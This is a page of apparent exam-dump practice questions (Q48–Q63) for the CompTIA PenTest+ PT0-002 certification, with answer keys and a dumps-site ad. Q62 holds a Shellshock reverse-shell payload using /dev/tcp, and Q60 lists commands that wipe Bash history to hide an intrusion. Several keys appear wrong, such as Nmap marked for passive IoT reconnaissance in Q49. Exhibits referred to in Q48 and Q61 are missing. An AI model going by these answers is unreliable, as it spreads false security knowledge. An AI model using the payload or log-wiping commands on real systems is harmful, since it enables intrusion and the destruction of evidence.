[Q48-Q63] PT0-002 Certification Exam Dumps Questions in here [Aug-2023]

PT0-002 Certification Exam Dumps Questions in here [Aug-2023]

Updated PT0-002 Exam Practice Test Questions

NEW QUESTION # 48
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

• A. Disable HTTP/301 redirect configuration.
• B. Implement a better method for authentication.
• C. Create an out-of-band network for management.
• D. Disable or upgrade SSH daemon.
• E. Enforce enhanced password complexity requirements.
• F. Eliminate network management and control interfaces.

Answer: A,C

NEW QUESTION # 49
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

• A. Nessus
• B. Shodan
• C. Nmap
• D. WebScarab-NG

Answer: C

NEW QUESTION # 50
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

• A. may reduce the true positive rate of findings.
• B. will reveal vulnerabilities in the Modbus protocol.
• C. may cause unintended failures in control systems.
• D. will create a denial-of-service condition on the IP networks.

Answer: C

NEW QUESTION # 51
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

• A. RFID cloning
• B. RFID tagging
• C. Tag nesting
• D. Meta tagging

Answer: C

Explanation:
since vlan hopping requires 2 vlans to be nested in a single packet. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link. https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation

NEW QUESTION # 52
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?

• A. User hashes sent over SMB
• B. Multiple handshakes
• C. IP addresses
• D. Encrypted file transfers

Answer: A

NEW QUESTION # 53
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

• A. Modify the malicious AP configuration to not use a pre-shared key.
• B. Send deauthentication frames to the stations.
• C. Set the malicious AP to broadcast within dynamic frequency selection channels.
• D. Perform jamming on all 2.4GHz and 5GHz channels.

Answer: C

NEW QUESTION # 54
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

• A. Acceptance by the client and sign-off on the final report
• B. Scheduling of follow-up actions and retesting
• C. Review of the lessons learned during the engagement
• D. Attestation of findings and delivery of the report

Answer: A

NEW QUESTION # 55
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

• A. Sending many web requests per second to test DDoS protection
• B. Fingerprinting all the IP addresses of the application's servers
• C. Brute forcing the application's passwords
• D. Crawling the web application's URLs looking for vulnerabilities

Answer: A

NEW QUESTION # 56
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

• A. Unsupported operating systems
• B. Inability to network
• C. The existence of default passwords
• D. Susceptibility to DDoS attacks

Answer: A

NEW QUESTION # 57
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

• A. Spawned shells
• B. Server logs
• C. ARP cache
• D. Administrator accounts
• E. Reboot system
• F. Created user accounts

Answer: A,F

Explanation:
Explanation
Removing shells: Remove any shell programs installed when performing
the pentest.
Removing tester-created credentials:
created during the pentest. This includes backdoor accounts.
Removing tools: Remove any software tools that were installed on the
customer's systems that were used to aid in the exploitation of systems.

NEW QUESTION # 58
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

• A. The web server is redirecting the requests.
• B. The web server is behind a load balancer.
• C. The local antivirus on the web server Is rejecting the connection.
• D. The web server is using a WAF.

Answer: D

Explanation:
Explanation
A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks. If a WAF detects an attack, it will often reset the TCP connection, causing the connection to be terminated. As a result, a penetration tester may see TCP resets when a WAF is present. Therefore, the most likely reason for the TCP resets returning from the web server is that the web server is using a WAF.

NEW QUESTION # 59
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

• A. Clarify the statement of work.
• B. Obtain an asset inventory from the client.
• C. Identify all third parties involved.
• D. Interview all stakeholders.

Answer: A

NEW QUESTION # 60
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

• A. Redirecting Bash history to /dev/null
• B. Making decoy files on the system to confuse incident responders
• C. Making a copy of the user's Bash history for further enumeration
• D. Covering tracks by clearing the Bash history

Answer: D

NEW QUESTION # 61
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?

• A. An account for RDP does not exist on the server.
• B. The tester input the incorrect IP address.
• C. PowerShell requires administrative privilege.
• D. The command requires the -port 135 option.

Answer: A

NEW QUESTION # 62
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

• A. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
• B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
• C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
• D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: C

NEW QUESTION # 63
......

Pass CompTIA PenTest+ PT0-002 Exam With 280 Questions: https://actualanswers.testsdumps.com/PT0-002_real-exam-dumps.html